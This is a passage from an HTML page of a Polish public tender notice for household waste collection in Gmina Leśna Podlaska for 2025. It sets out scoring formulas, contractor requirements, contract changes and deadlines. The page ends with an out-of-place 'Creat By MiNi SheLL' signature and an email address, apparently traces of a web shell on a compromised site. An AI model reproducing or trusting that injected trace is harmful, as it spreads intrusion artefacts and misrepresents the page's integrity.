Usługi wywozu odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <p class="mb-0">90514000-3 - Usługi recyklingu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących<br/>kryteriów oceny ofert:<br/>Lp. Nazwa kryterium Znaczenie kryterium (w %)<br/>1 Cena (C) 60<br/>2 Potencjał techniczny (EURO V) (T) 40<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1<br/>punkt.<br/>17.2. Punkty za kryterium „Cena” - (C) zostaną obliczone według wzoru:<br/>Cn<br/>C = ------- x 60 pkt<br/>Cb<br/>gdzie,<br/>C - ilość punktów za kryterium cena,<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu<br/>do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>17.3. Ocena punktowa kryterium „Potencjał techniczny” – (T) dokonana zostanie w poniższy sposób:<br/>Potencjał techniczny Liczba pkt.<br/>Pojazdy z normą emisji spalin EURO 4 lub niższą 0 pkt.<br/>Pojazdy z normą emisji spalin EURO 5 lub EURO 6 40 pkt.<br/>Punktacja zostanie przyznana przez Zamawiającego odpowiednio dla wszystkich z pojazdów przedstawionych przez Wykonawcę do<br/>realizacji zamówienia. Liczba punktów uzyskanych przez daną ofertę w kryterium: „Potencjał techniczny” zostanie ustalona przez<br/>zsumowanie punktacji dla poszczególnych pojazdów wskazanych w wykazie, którego wzór stanowi Załącznik nr 7 do SWZ i<br/>podzielenie przez liczbę pojazdów.<br/>T1+T2+T3+…+Tn<br/>T = ------------------------<br/>LP<br/>gdzie:<br/>T – ilość punktów w kryterium potencjał techniczny<br/>T1+T2+T3+…+Tn – suma punktów uzyskanych w kryterium potencjał techniczny przed dany pojazd z wykazu (poszczególne<br/>współczynniki T1 do Tn uzyskują wartośći „0” lub „40” zgodnie w powyższą tabelą.<br/>LP – liczba pojazdów (sztuk) wskazana w wykazie, którego wzór stanowi Załącznik nr 7 do SWZ<br/>17.4. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>L= C+T<br/>Gdzie,<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Cena ofertowa brutto”,<br/>T – punkty uzyskane w kryterium „Potencjał techniczny”<br/>17.5. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>17.6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Potencjał techniczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.1. zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów;<br/>Zamawiający określa, że ww. warunek zostanie spełniony, jeśli Wykonawca wykaże, że posiada:<br/>a) wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, o<br/>którym mowa w przepisie art. 9b ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach w<br/>zakresie wszystkich rodzajów odpadów objętych niniejszym postępowaniem,<br/>b) aktualne zezwolenie na prowadzenie działalności w zakresie transportu odpadów zgodnie z przepisami ustawy z dnia 14<br/>grudnia 2012 r. o odpadach w zakresie rodzajów odpadów objętych niniejszym postępowaniem,<br/>6.1.3. sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>6.1.4. zdolności technicznej lub zawodowej w zakresie:<br/>a) Zamawiający określa, że ww. warunek zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), wykonał (a w<br/>przypadku świadczeń powtarzających się lub ciągłych nadal wykonuje) należycie: co najmniej jedną usługę świadczoną w<br/>sposób ciągły przez okres minimum 12 miesięcy polegającą na odbiorze i zagospodarowaniu odpadów komunalnych w<br/>ilości nie mniejszej niż 600 ton (600 Mg).<br/>Uwaga:<br/>Wykonawca powinien w wykazie usług wyraźnie określić zakres<br/>usług, w tym ilość odpadów, aby można było ustalić, czy spełnia warunek udziału w postępowaniu.<br/>b) Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że do wykonania zamówienia dysponuje<br/>następującym potencjałem technicznym:<br/>− dwoma pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych przystosowanych do odbioru<br/>pojemników 60 - 1100 l;<br/>− dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych przystosowanych do<br/>odbioru pojemników 60 - 1100 l ;<br/>− jednym pojazdem do odbierania odpadów bez funkcji kompaktującej (z dźwignikiem hakowym lub bramowym do odbioru<br/>kontenerów KP-5 , KP-7 z odpadami).<br/>Uwaga:<br/>1. Pojazdy powinny być trwale i czytelnie oznakowane, w widocznym miejscu nazwą firmy oraz danymi adresowymi i nr<br/>telefonu podmiotu odbierającego odpad.<br/>2. Pojazdy winny spełniać wymagania określone w § 5 ust. 1 z rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013<br/>roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości.<br/> usytuowaną na terenie Gminy Leśna Podlaska lub nie dalej niż 60 km od granic administracyjnych gminy bazą<br/>magazynowo - transportową. Baza magazynowo - transportowa musi spełniać warunki określone w Rozporządzeniu<br/>Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów<br/>komunalnych od właścicieli nieruchomości. Baza powinna być usytuowana na terenie, do którego Wykonawca posiada tytuł<br/>prawny.<br/>6.2. Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie postępowania, uznać, że<br/>Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze<br/>Wykonawcy może mieć negatywny wpływ na realizację zamówienia na każdym etapie postępowania (art. 116 ust. 2 ustawy<br/>Pzp).<br/>6.3. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w<br/>pkt 6.1.2 SWZ, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których<br/>realizacji te uprawnienia są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga<br/>złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) potwierdzenia wpisu do rejestru działalności regulowanej, o którym mowa w art. 9b ust. 2 ustawy z dnia 13 września 1996 r. o<br/>utrzymaniu czystości i porządku w gminach w zakresie wszystkich rodzajów odpadów objętych niniejszym postępowaniem, w<br/>odniesieniu do warunku określonego w pkt 6.1.2, lit. a) SWZ<br/>b) aktualnego zezwolenia na prowadzenie działalności w zakresie transportu odpadów zgodnie z przepisami ustawy z dnia 14<br/>grudnia 2012 r. o odpadach w zakresie rodzajów odpadów objętych niniejszym postępowaniem lub wpis do rejestru BDO w zakresie<br/>rodzajów odpadów objętych niniejszym postępowaniem w odniesieniu do warunku określonego w pkt 6.1.2, lit. b) SWZ<br/>c) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem<br/>dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych<br/>referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy<br/>przed terminem składania ofert zgodnie z wzorem stanowiącym Załącznik nr 6 do SWZ– w odniesieniu do warunku określonego w<br/>pkt. 6.1.4, lit a) SWZ,<br/>d) wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie do dysponowania tymi zasobami zgodnie z wzorem stanowiącym Załącznik nr 7 do SWZ<br/>– w odniesieniu do warunku określonego w pkt. 6.1.4, lit b) SWZ,</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia<br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>Wykonawcy.<br/>W przypadku gdy ofertę składa spółka cywilna, a pełen zakres prac wykonają wspólnicy wspólnie w ramach umowy spółki<br/>oświadczenie powinno potwierdzać ten fakt.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ,<br/>przy czym podmiotowe środki dowodowe, o których mowa w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy,<br/>który/którzy wykazuje/-ą spełnienie warunku.<br/>Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać<br/>przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony dopuszczają możliwość zmiany umowy w sytuacjach określonych w art. 454 i 455 ustawy Prawo zamówień<br/>publicznych (t.j. Dz.U. z 2023 r., poz. 1605 ze zm.) i innych przypadkach wskazanych w niniejszej umowie, Zamawiający<br/>dopuszcza możliwość wprowadzenia zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy.<br/>2. Strony dopuszczają dokonywanie zmian w umowie w zakresie terminu wykonania umowy w przypadku:<br/>a) wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami lub<br/>obowiązującymi przepisami prawa. Zmiana terminu nastąpi wyłącznie o czas działania siły wyższej oraz czas potrzebny na<br/>usunięcie skutków tego działania,<br/>b) wystąpienie opóźnień, przeszkód, utrudnień powstałych z przyczyn dotyczących Zamawiającego, w szczególności w<br/>przypadku niewyłonienia Wykonawcy<br/>na kolejny okres wykonywania przedmiotu umowy.<br/>c) w przypadku gdy zamawiający nie zakończy prowadzonego postępowania na wybór wykonawcy usługi w roku 2024<br/>strony przewidują możliwość przedłużenia okresu realizacji umowy na czas niezbędny do zakończenia takiego<br/>postępowania, z podwyższeniem wynagrodzenia wykonawcy o kwotę wynikająca z przeprowadzonych negocjacji nie<br/>wyższą niż wskaźnik inflacji.<br/>3. Zamawiający przewiduje możliwość zmiany umowy w przypadku zmiany ustawowej stawki podatku od towarów i usług -<br/>zmianie ulegnie wysokość wynagrodzenia Wykonawcy adekwatnie do wprowadzonej zmiany wysokości stawki VAT. Zmiana<br/>wysokości wynagrodzenia Wykonawcy będzie dokonana w oparciu o dane dotyczące zastosowanej stawki VAT, które<br/>wykonawca przedłoży zamawiającemu przed podpisaniem umowy. Zmiana wysokości wynagrodzenia będzie odnosić się<br/>wyłącznie<br/>do części przedmiotu umowy zrealizowanej po dniu wejścia w życie przepisów zmieniających stawkę podatku od towarów i<br/>usług oraz wyłącznie do części przedmiotu umowy, do której zastosowanie znajdzie zmiana stawki podatku od towarów i<br/>usług.<br/>W celu wprowadzenia zmiany, każda ze stron może wystąpić do drugiej strony,<br/>w terminie do 30 dni od dnia wejścia w życie przepisów wprowadzających zmiany stawki VAT, z wnioskiem o dokonanie<br/>zmiany wysokości wynagrodzenia należnego Wykonawcy, wraz z uzasadnieniem zawierającym w szczególności wyliczenie<br/>całkowitej kwoty, o jaką wynagrodzenie Wykonawcy powinno ulec zmianie, oraz wskazaniem daty, od której nastąpiła bądź<br/>nastąpi zmiana wysokości kosztów wykonania umowy uzasadniająca zmianę wysokości należnego wynagrodzenia.<br/>4. Zamawiający przewiduje możliwość zmiany instalacji przetwarzania odpadów komunalnych do których Wykonawca<br/>zobowiązał się w ofercie przekazywać odpady.<br/>5. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego<br/>aneksu pod rygorem nieważności.<br/>6. Nie stanowi zmiany istotnej umowy w rozumieniu art. 454 ustawy Prawo zamówień publicznych:<br/>a) zmiana danych teleadresowych,<br/>b) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-06 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-02-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dnia 13 kwietnia 2022<br/>r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego.<br/>Zamawiający informuje, że wykluczeniu z postępowania na podstawie pkt 7.6 SWZ podlegają:<br/>1) wykonawcy wymienieni w wykazach określonych w rozporządzeniu Rady (WE) nr 765/2006 z dnia 18 maja 2006 r.<br/>dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy<br/>(Dz. Urz. UE L 134 z 20.05.2006, str. 1, z późn. zm.3) i rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014 r. w<br/>sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i<br/>niezależność Ukrainy lub im zagrażających (Dz. Urz. UE L 78 z 17.03.2014, str. 6, z późn. zm.4)) albo wpisani na listę o<br/>której mowa w art. 2 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, na podstawie decyzji w sprawie wpisu<br/>na ww. listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 powołanej ustawy;<br/>2) wykonawcy, których beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu<br/>pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu Rady (WE) nr 765/2006 z dnia 18 maja 2006 r. dotyczącego środków ograniczających w związku z sytuacją<br/>na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz. Urz. UE L 134 z 20.05.2006, str. 1, z późn. zm.3) i<br/>rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014 r. w sprawie środków ograniczających w odniesieniu do<br/>działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających (Dz. Urz. UE L<br/>78 z 17.03.2014, str. 6, z późn. zm.4)) albo wpisani na listę o której mowa w art. 2 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego, lub będący takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile zostali wpisani<br/>na ww. listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o kto rym mowa w art. 1<br/>pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>Z uwagi na ograniczoną ilość znaków pozostałe szczegółowe informacje znajdują się w rozdziale 7 SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com